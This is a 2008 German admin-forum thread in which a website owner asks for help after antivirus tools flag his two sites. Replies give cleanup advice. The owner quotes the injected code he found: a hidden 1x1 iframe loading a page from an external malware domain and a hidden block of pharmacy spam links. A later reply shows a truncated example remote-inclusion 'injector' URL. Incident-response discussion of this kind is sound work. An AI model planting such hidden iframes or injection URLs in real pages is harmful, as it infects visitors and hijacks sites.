Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Probleme mit Trojaner Warnungen auf meinen Webseiten

Frage Internet

Mitglied: Pussemuckelpeter

Pussemuckelpeter (Level 1) - Jetzt verbinden

13.02.2008, aktualisiert 07.08.2008, 10104 Aufrufe, 6 Kommentare

Hallo zusammen

Ich habe da glaube ich ein ernstes Problem

Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.

Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e

Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...


Laut 1&1 , meinem Webhoster können die nix finden.


Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.

Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.


Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...

Gruß
Mitglied: kaiand1
13.02.2008 um 20:34 Uhr
du scheinst da ein/mehere Javascripte zu haben wo sich der Trojaner befindet bzw ein Script? was da nicht hingehört
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
Bitte warten ..
Mitglied: wiesi200
13.02.2008 um 21:05 Uhr
Gehört zwar nicht hier her aber, tolle Seite. Hab’s gleich unseren Ausbildungsmeister geschickt.
Das hat wirklich Respekt verdient.
Bitte warten ..
Mitglied: filippg
13.02.2008 um 22:11 Uhr
Hallo,

hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.

Gruß

Filipp
Bitte warten ..
Mitglied: LordGurke
13.02.2008 um 22:22 Uhr
Hat vielleicht jemand deine FTP-Daten geknackt?
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Bitte warten ..
Mitglied: Pussemuckelpeter
14.02.2008 um 07:10 Uhr
Hallo, vielen Dank für Eure / Ihre Antworten.

Ich habe das hier in den beiden index Dateien gefunden:

<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">&nbsp;
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none"><a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/in ..." viagra</a>
<a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/ma ..." levitra</a><a href="http://lothlorian.org.ua;>buy" viagra, buy xenical, viagra,buy levitra, porno</a><a href="http://www.ptshome.com/pressreleases/lego/map.html;>Lego" toys</a>
<a href="http://www.ptshome.com/pressreleases/lego/index.html;>Lego</ ..."
</div>


Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.

Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.

Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...

Gruß
Bitte warten ..
Mitglied: 0x0badc0de
07.08.2008 um 23:47 Uhr
Hallo...

!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.

mfg
0x0badc0de
Bitte warten ..
Ähnliche Inhalte
Exchange Server
gelöst Probleme mit Active Sync (6)

Frage von Henere zum Thema Exchange Server ...

Voice over IP
gelöst RTP Probleme bei Yealink T46G - erster Satz ist oft nicht zu hören (4)

Frage von istike2 zum Thema Voice over IP ...

Windows Installation
Probleme bei der Installation von neuen Rollen auf Windows 2008 SBS (1)

Frage von florian.rhomberg zum Thema Windows Installation ...

CPU, RAM, Mainboards
Intel Atom C2000 sorgt für Probleme (1)

Link von transocean zum Thema CPU, RAM, Mainboards ...

Heiß diskutierte Inhalte
Router & Routing
Tipps für Router (ca. 100 clients, VPN) (18)

Frage von oel-auge zum Thema Router & Routing ...

Windows 7
BOOTMGR is missing (auch nach bootrec -RebuildBcd) (16)

Frage von Mipronimo zum Thema Windows 7 ...

TK-Netze & Geräte
gelöst Convert von TAPI auf CAPI gesucht (13)

Frage von StefanKittel zum Thema TK-Netze & Geräte ...